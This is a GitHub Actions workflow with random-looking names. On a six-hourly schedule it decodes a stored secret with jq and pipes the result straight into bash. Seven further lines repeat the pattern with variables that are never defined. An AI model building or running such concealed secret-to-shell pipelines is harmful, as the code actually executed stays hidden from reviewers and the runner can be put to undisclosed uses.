name: muhong19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '31 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: muhong19871010
        env:
          kzo9: ${{ secrets.kzo9 }}
        run: |
          echo $kzo9 | jq -r .zb6 | /bin/bash
          echo $jbx15 | jq -r .nhlur643 | /bin/bash
          echo $agx14 | jq -r .xeye0 | /bin/bash
          echo $ppyyv84823 | jq -r .koovp677 | /bin/bash
          echo $iuid855 | jq -r .pdjjc9 | /bin/bash
          echo $vqzfh25 | jq -r .bu14771 | /bin/bash
          echo $yh15 | jq -r .s976 | /bin/bash
          echo $nevk33981 | jq -r .pn9 | /bin/bash

